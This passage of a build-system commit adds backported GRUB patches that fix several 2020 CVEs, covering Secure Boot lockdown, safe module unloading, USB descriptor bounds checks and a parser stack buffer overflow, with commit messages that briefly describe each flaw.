++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+ 
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+ 
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+  */
+ 
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+   lockdown = GRUB_LOCKDOWN_ENABLED;
+ 
+   grub_verifier_register (&lockdown_verifier);
++
++  grub_env_set ("lockdown", "y");
++  grub_env_export ("lockdown");
+ }
+ 
+ int
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
new file mode 100644
index 0000000000..ac509b63c7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+   /* Initialize the memory management system.  */
+   grub_efi_mm_init ();
+ 
++  /*
++   * Lockdown the GRUB and register the shim_lock verifier
++   * if the UEFI Secure Boot is enabled.
++   */
++  if (grub_efi_secure_boot ())
++    {
++      grub_lockdown ();
++      /* NOTE: Our version does not have the shim_lock_verifier,
++       * need to update below if added */
++#if 0
++      grub_shim_lock_verifier_setup ();
++#endif
++    }
++
+   efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 	      0, 0, 0, NULL);
+ 
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
new file mode 100644
index 0000000000..12ec4e1c17
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
+From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:33 +0200
+Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
+ modules list
+
+Now the GRUB can check if it has been locked down and this can be used to
+prevent executing commands that can be utilized to circumvent the UEFI
+Secure Boot mechanisms. So, instead of hardcoding a list of modules that
+have to be disabled, prevent the usage of commands that can be dangerous.
+
+This not only allows the commands to be disabled on other platforms, but
+also properly separate the concerns. Since the shim_lock verifier logic
+should be only about preventing to run untrusted binaries and not about
+defining these kind of policies.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi                  | 10 ++++++++++
+ grub-core/commands/i386/wrmsr.c |  5 +++--
+ grub-core/commands/iorw.c       | 19 ++++++++++---------
+ grub-core/commands/memrw.c      | 19 ++++++++++---------
+ 4 files changed, 33 insertions(+), 20 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 5e6cace..0786427 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
+ Also, if you specify a reserved or unimplemented MSR address, it will
+ cause a general protection exception (which is not currently being handled)
+ and the system will reboot.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++      This is done to prevent subverting various security mechanisms.
+ @end deffn
+ 
+ @node xen_hypervisor
+@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
+ shim_lock module. And itself it is a persistent module which means that
+ it cannot be unloaded if it was loaded into the memory.
+ 
++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
++and @command{memrw} will not be available when the UEFI secure boot is enabled.
++This is done for security reasons and are enforced by the GRUB Lockdown mechanism
++(@pxref{Lockdown}).
++
+ @node Measured Boot
+ @section Measuring boot components
+ 
+diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
+index 9c5e510..56a29c2 100644
+--- a/grub-core/commands/i386/wrmsr.c
++++ b/grub-core/commands/i386/wrmsr.c
+@@ -24,6 +24,7 @@
+ #include <grub/env.h>
+ #include <grub/command.h>
+ #include <grub/extcmd.h>
++#include <grub/lockdown.h>
+ #include <grub/i18n.h>
+ #include <grub/i386/cpuid.h>
+ #include <grub/i386/wrmsr.h>
+@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
+ 
+ GRUB_MOD_INIT(wrmsr)
+ {
+-  cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
+-				     N_("Write a value to a CPU model specific register."));
++  cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
++                                              N_("Write a value to a CPU model specific register."));
+ }
+ 
+ GRUB_MOD_FINI(wrmsr)
+diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
+index a0c164e..584baec 100644
+--- a/grub-core/commands/iorw.c
++++ b/grub-core/commands/iorw.c
+@@ -23,6 +23,7 @@
+ #include <grub/env.h>
+ #include <grub/cpu/io.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+ 
+ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
+ 			  N_("PORT"), N_("Read 32-bit value from PORT."),
+ 			  options);
+   cmd_write_byte =
+-    grub_register_command ("outb", grub_cmd_write,
+-			   N_("PORT VALUE [MASK]"),
+-			   N_("Write 8-bit VALUE to PORT."));
++    grub_register_command_lockdown ("outb", grub_cmd_write,
++                                    N_("PORT VALUE [MASK]"),
++                                    N_("Write 8-bit VALUE to PORT."));
+   cmd_write_word =
+-    grub_register_command ("outw", grub_cmd_write,
+-			   N_("PORT VALUE [MASK]"),
+-			   N_("Write 16-bit VALUE to PORT."));
++    grub_register_command_lockdown ("outw", grub_cmd_write,
++                                    N_("PORT VALUE [MASK]"),
++                                    N_("Write 16-bit VALUE to PORT."));
+   cmd_write_dword =
+-    grub_register_command ("outl", grub_cmd_write,
+-			   N_("ADDR VALUE [MASK]"),
+-			   N_("Write 32-bit VALUE to PORT."));
++    grub_register_command_lockdown ("outl", grub_cmd_write,
++                                    N_("ADDR VALUE [MASK]"),
++                                    N_("Write 32-bit VALUE to PORT."));
+ }
+ 
+ GRUB_MOD_FINI(memrw)
+diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
+index 98769ea..d401a6d 100644
+--- a/grub-core/commands/memrw.c
++++ b/grub-core/commands/memrw.c
+@@ -22,6 +22,7 @@
+ #include <grub/extcmd.h>
+ #include <grub/env.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+ 
+ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
+ 			  N_("ADDR"), N_("Read 32-bit value from ADDR."),
+ 			  options);
+   cmd_write_byte =
+-    grub_register_command ("write_byte", grub_cmd_write,
+-			   N_("ADDR VALUE [MASK]"),
+-			   N_("Write 8-bit VALUE to ADDR."));
++    grub_register_command_lockdown ("write_byte", grub_cmd_write,
++                                    N_("ADDR VALUE [MASK]"),
++                                    N_("Write 8-bit VALUE to ADDR."));
+   cmd_write_word =
+-    grub_register_command ("write_word", grub_cmd_write,
+-			   N_("ADDR VALUE [MASK]"),
+-			   N_("Write 16-bit VALUE to ADDR."));
++    grub_register_command_lockdown ("write_word", grub_cmd_write,
++                                    N_("ADDR VALUE [MASK]"),
++                                    N_("Write 16-bit VALUE to ADDR."));
+   cmd_write_dword =
+-    grub_register_command ("write_dword", grub_cmd_write,
+-			   N_("ADDR VALUE [MASK]"),
+-			   N_("Write 32-bit VALUE to ADDR."));
++    grub_register_command_lockdown ("write_dword", grub_cmd_write,
++                                    N_("ADDR VALUE [MASK]"),
++                                    N_("Write 32-bit VALUE to ADDR."));
+ }
+ 
+ GRUB_MOD_FINI(memrw)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25632.patch b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
new file mode 100644
index 0000000000..0b37c72f0f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
+From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 29 Sep 2020 14:08:55 +0200
+Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
+
+When a module is attempted to be removed its reference counter is always
+decremented. This means that repeated rmmod invocations will cause the
+module to be unloaded even if another module depends on it.
+
+This may lead to a use-after-free scenario allowing an attacker to execute
+arbitrary code and by-pass the UEFI Secure Boot protection.
+
+While being there, add the extern keyword to some function declarations in
+that header file.
+
+Fixes: CVE-2020-25632
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
+CVE: CVE-2020-25632
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/minicmd.c | 7 +++++--
+ grub-core/kern/dl.c          | 9 +++++++++
+ include/grub/dl.h            | 8 +++++---
+ 3 files changed, 19 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
+index 6bbce3128..fa498931e 100644
+--- a/grub-core/commands/minicmd.c
++++ b/grub-core/commands/minicmd.c
+@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
+   if (grub_dl_is_persistent (mod))
+     return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
+ 
+-  if (grub_dl_unref (mod) <= 0)
+-    grub_dl_unload (mod);
++  if (grub_dl_ref_count (mod) > 1)
++    return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
++
++  grub_dl_unref (mod);
++  grub_dl_unload (mod);
+ 
+   return 0;
+ }
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..48f8a7907 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
+   return --mod->ref_count;
+ }
+ 
++int
++grub_dl_ref_count (grub_dl_t mod)
++{
++  if (mod == NULL)
++    return 0;
++
++  return mod->ref_count;
++}
++
+ static void
+ grub_dl_flush_cache (grub_dl_t mod)
+ {
+diff --git a/include/grub/dl.h b/include/grub/dl.h
+index f03c03561..b3753c9ca 100644
+--- a/include/grub/dl.h
++++ b/include/grub/dl.h
+@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
+ grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
+ grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
+ int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
+-void grub_dl_unload_unneeded (void);
+-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
+-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern void grub_dl_unload_unneeded (void);
++extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
++
+ extern grub_dl_t EXPORT_VAR(grub_dl_head);
+ 
+ #ifndef GRUB_UTIL
+-- 
+2.33.0
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25647.patch b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
new file mode 100644
index 0000000000..cb77fd4772
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
+From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Fri, 11 Dec 2020 19:19:21 +0100
+Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
+ devices
+
+The maximum number of configurations and interfaces are fixed but there is
+no out-of-bound checking to prevent a malicious USB device to report large
+values for these and cause accesses outside the arrays' memory.
+
+Fixes: CVE-2020-25647
+
+Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
+Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
+CVE: CVE-2020-25647
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/bus/usb/usb.c | 15 ++++++++++++---
+ include/grub/usb.h      | 10 +++++++---
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
+index 8da5e4c74..7cb3cc230 100644
+--- a/grub-core/bus/usb/usb.c
++++ b/grub-core/bus/usb/usb.c
+@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
+ grub_usb_err_t
+ grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
+ {
++  if (endpoint >= GRUB_USB_MAX_TOGGLE)
++    return GRUB_USB_ERR_BADDEVICE;
++
+   dev->toggle[endpoint] = 0;
+   return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
+ 				     | GRUB_USB_REQTYPE_STANDARD
+@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+     return err;
+   descdev = &dev->descdev;
+ 
+-  for (i = 0; i < 8; i++)
++  for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+     dev->config[i].descconf = NULL;
+ 
+-  if (descdev->configcnt == 0)
++  if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
+     {
+       err = GRUB_USB_ERR_BADDEVICE;
+       goto fail;
+@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+       /* Skip the configuration descriptor.  */
+       pos = dev->config[i].descconf->length;
+ 
++      if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
++        {
++          err = GRUB_USB_ERR_BADDEVICE;
++          goto fail;
++        }
++
+       /* Read all interfaces.  */
+       for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
+ 	{
+@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ 
+  fail:
+ 
+-  for (i = 0; i < 8; i++)
++  for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+     grub_free (dev->config[i].descconf);
+ 
+   return err;
+diff --git a/include/grub/usb.h b/include/grub/usb.h
+index 512ae1dd0..6475c552f 100644
+--- a/include/grub/usb.h
++++ b/include/grub/usb.h
+@@ -23,6 +23,10 @@
+ #include <grub/usbdesc.h>
+ #include <grub/usbtrans.h>
+ 
++#define GRUB_USB_MAX_CONF    8
++#define GRUB_USB_MAX_IF      32
++#define GRUB_USB_MAX_TOGGLE  256
++
+ typedef struct grub_usb_device *grub_usb_device_t;
+ typedef struct grub_usb_controller *grub_usb_controller_t;
+ typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
+@@ -167,7 +171,7 @@ struct grub_usb_configuration
+   struct grub_usb_desc_config *descconf;
+ 
+   /* Interfaces associated to this configuration.  */
+-  struct grub_usb_interface interf[32];
++  struct grub_usb_interface interf[GRUB_USB_MAX_IF];
+ };
+ 
+ struct grub_usb_hub_port
+@@ -191,7 +195,7 @@ struct grub_usb_device
+   struct grub_usb_controller controller;
+ 
+   /* Device configurations (after opening the device).  */
+-  struct grub_usb_configuration config[8];
++  struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
+ 
+   /* Device address.  */
+   int addr;
+@@ -203,7 +207,7 @@ struct grub_usb_device
+   int initialized;
+ 
+   /* Data toggle values (used for bulk transfers only).  */
+-  int toggle[256];
++  int toggle[GRUB_USB_MAX_TOGGLE];
+ 
+   /* Used by libusb wrapper.  Schedulded for removal. */
+   void *data;
+-- 
+2.33.0
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
+From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Thu, 7 Jan 2021 19:21:03 +0000
+Subject: kern/parser: Fix a stack buffer overflow
+
+grub_parser_split_cmdline() expands variable names present in the supplied
+command line in to their corresponding variable contents and uses a 1 kiB
+stack buffer for temporary storage without sufficient bounds checking. If
+the function is called with a command line that references a variable with
+a sufficiently large payload, it is possible to overflow the stack
+buffer via tab completion, corrupt the stack frame and potentially
+control execution.
+
+Fixes: CVE-2020-27749
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
+CVE: CVE-2020-27749
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/Makefile.core.def |   1 +
+ grub-core/kern/buffer.c     | 117 +++++++++++++++++++++
+ grub-core/kern/parser.c     | 204 +++++++++++++++++++++++-------------
+ include/grub/buffer.h       | 144 +++++++++++++++++++++++++
+ 4 files changed, 395 insertions(+), 71 deletions(-)
+ create mode 100644 grub-core/kern/buffer.c
+ create mode 100644 include/grub/buffer.h
+
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 651ea2a..823cd57 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -123,6 +123,7 @@ kernel = {
+   riscv32_efi_startup = kern/riscv/efi/startup.S;
+   riscv64_efi_startup = kern/riscv/efi/startup.S;
+ 
++  common = kern/buffer.c;
+   common = kern/command.c;
+   common = kern/corecmd.c;
+   common = kern/device.c;
+diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
+new file mode 100644
+index 0000000..9f5f8b8
+--- /dev/null
++++ b/grub-core/kern/buffer.c
+@@ -0,0 +1,117 @@
++/*
++ *  GRUB  --  GRand Unified Bootloader
++ *  Copyright (C) 2021  Free Software Foundation, Inc.
++ *
++ *  GRUB is free software: you can redistribute it and/or modify
++ *  it under the terms of the GNU General Public License as published by
++ *  the Free Software Foundation, either version 3 of the License, or
++ *  (at your option) any later version.
++ *
++ *  GRUB is distributed in the hope that it will be useful,
++ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
++ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ *  GNU General Public License for more details.
++ *
++ *  You should have received a copy of the GNU General Public License
++ *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <grub/buffer.h>
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++grub_buffer_t
++grub_buffer_new (grub_size_t sz)
++{
++  struct grub_buffer *ret;
++
++  ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
++  if (ret == NULL)
++    return NULL;
++
++  ret->data = (grub_uint8_t *) grub_malloc (sz);
++  if (ret->data == NULL)
++    {
++      grub_free (ret);
++      return NULL;
++    }
++
++  ret->sz = sz;
++  ret->pos = 0;
++  ret->used = 0;
++
++  return ret;
++}
++
++void
++grub_buffer_free (grub_buffer_t buf)
++{
++  grub_free (buf->data);
++  grub_free (buf);
++}
++
++grub_err_t
++grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
++{
++  grub_uint8_t *d;
++  grub_size_t newsz = 1;
++
++  /* Is the current buffer size adequate? */
++  if (buf->sz >= req)
++    return GRUB_ERR_NONE;
++
++  /* Find the smallest power-of-2 size that satisfies the request. */
++  while (newsz < req)
++    {
++      if (newsz == 0)
++	return grub_error (GRUB_ERR_OUT_OF_RANGE,
++			   N_("requested buffer size is too large"));
++      newsz <<= 1;
++    }
++
++  d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
++  if (d == NULL)
++    return grub_errno;
++
++  buf->data = d;
++  buf->sz = newsz;
++
++  return GRUB_ERR_NONE;
++}
++
++void *
++grub_buffer_take_data (grub_buffer_t buf)
++{
++  void *data = buf->data;
++
++  buf->data = NULL;
++  buf->sz = buf->pos = buf->used = 0;
++
++  return data;
++}
++
++void
++grub_buffer_reset (grub_buffer_t buf)
++{
++  buf->pos = buf->used = 0;
++}
++
++grub_err_t
++grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
++{
++  grub_size_t newpos;
++
++  if (grub_add (buf->pos, n, &newpos))
++    return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++  if (newpos > buf->used)
++    return grub_error (GRUB_ERR_OUT_OF_RANGE,
++		       N_("new read is position beyond the end of the written data"));
++
++  buf->pos = newpos;
++
++  return GRUB_ERR_NONE;
++}
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index d1cf061..6ab7aa4 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -1,7 +1,7 @@
+ /* parser.c - the part of the parser that can return partial tokens */
+ /*
+  *  GRUB  --  GRand Unified Bootloader
+- *  Copyright (C) 2005,2007,2009  Free Software Foundation, Inc.
++ *  Copyright (C) 2005,2007,2009,2021  Free Software Foundation, Inc.
+  *
+  *  GRUB is free software: you can redistribute it and/or modify
+  *  it under the terms of the GNU General Public License as published by
+@@ -18,6 +18,7 @@
+  */
+ 
+ #include <grub/parser.h>
++#include <grub/buffer.h>
+ #include <grub/env.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
+ }
+ 
+ 
+-static void
+-add_var (char *varname, char **bp, char **vp,
++static grub_err_t
++add_var (grub_buffer_t varname, grub_buffer_t buf,
+ 	 grub_parser_state_t state, grub_parser_state_t newstate)
+ {
+   const char *val;
+@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
+   /* Check if a variable was being read in and the end of the name
+      was reached.  */
+   if (!(check_varstate (state) && !check_varstate (newstate)))
+-    return;
++    return GRUB_ERR_NONE;
++
++  if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
++    return grub_errno;
+ 
+-  *((*vp)++) = '\0';
+-  val = grub_env_get (varname);
+-  *vp = varname;
++  val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
++  grub_buffer_reset (varname);
+   if (!val)
+-    return;
++    return GRUB_ERR_NONE;
+ 
+   /* Insert the contents of the variable in the buffer.  */
+-  for (; *val; val++)
+-    *((*bp)++) = *val;
++  return grub_buffer_append_data (buf, val, grub_strlen (val));
++}
++
++static grub_err_t
++terminate_arg (grub_buffer_t buffer, int *argc)
++{
++  grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
++
++  if (unread == 0)
++    return GRUB_ERR_NONE;
++
++  if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
++    return GRUB_ERR_NONE;
++
++  if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
++    return grub_errno;
++
++  (*argc)++;
++
++  return GRUB_ERR_NONE;
++}
++
++static grub_err_t
++process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
++	      grub_parser_state_t state, int *argc,
++	      grub_parser_state_t *newstate)
++{
++  char use;
++
++  *newstate = grub_parser_cmdline_state (state, c, &use);
++
++  /*
++   * If a variable was being processed and this character does
++   * not describe the variable anymore, write the variable to
++   * the buffer.
++   */
++  if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
++    return grub_errno;
++
++  if (check_varstate (*newstate))
++    {
++      if (use)
++        return grub_buffer_append_char (varname, use);
++    }
++  else if (*newstate == GRUB_PARSER_STATE_TEXT &&
++	   state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
++    {
++      /*
++       * Don't add more than one argument if multiple
++       * spaces are used.
++       */
++      return terminate_arg (buffer, argc);
++    }
++  else if (use)
++    return grub_buffer_append_char (buffer, use);
++
++  return GRUB_ERR_NONE;
+ }
+ 
+ grub_err_t
+@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
+ 			   int *argc, char ***argv)
+ {
+   grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
+-  /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
+-     allocated.  */
+-  char buffer[1024];
+-  char *bp = buffer;
++  grub_buffer_t buffer, varname;
+   char *rd = (char *) cmdline;
+-  char varname[200];
+-  char *vp = varname;
+-  char *args;
++  char *rp = rd;
+   int i;
+ 
+   *argc = 0;
+   *argv = NULL;
++
++  buffer = grub_buffer_new (1024);
++  if (buffer == NULL)
++    return grub_errno;
++
++  varname = grub_buffer_new (200);
++  if (varname == NULL)
++    goto fail;
++
+   do
+     {
+-      if (!rd || !*rd)
++      if (rp == NULL || *rp == '\0')
+ 	{
++	  if (rd != cmdline)
++	    {
++	      grub_free (rd);
++	      rd = rp = NULL;
++	    }
+ 	  if (getline)
+-	    getline (&rd, 1, getline_data);
++	    {
++	      getline (&rd, 1, getline_data);
++	      rp = rd;
++	    }
+ 	  else
+ 	    break;
+ 	}
+@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
+       if (!rd)
+ 	break;
+ 
+-      for (; *rd; rd++)
++      for (; *rp != '\0'; rp++)
+ 	{
+ 	  grub_parser_state_t newstate;
+-	  char use;
+ 
+-	  newstate = grub_parser_cmdline_state (state, *rd, &use);
++	  if (process_char (*rp, buffer, varname, state, argc,
++			    &newstate) != GRUB_ERR_NONE)
++	    goto fail;
+ 
+-	  /* If a variable was being processed and this character does
+-	     not describe the variable anymore, write the variable to
+-	     the buffer.  */
+-	  add_var (varname, &bp, &vp, state, newstate);
+-
+-	  if (check_varstate (newstate))
+-	    {
+-	      if (use)
+-		*(vp++) = use;
+-	    }
+-	  else
+-	    {
+-	      if (newstate == GRUB_PARSER_STATE_TEXT
+-		  && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
+-		{
+-		  /* Don't add more than one argument if multiple
+-		     spaces are used.  */
+-		  if (bp != buffer && *(bp - 1))
+-		    {
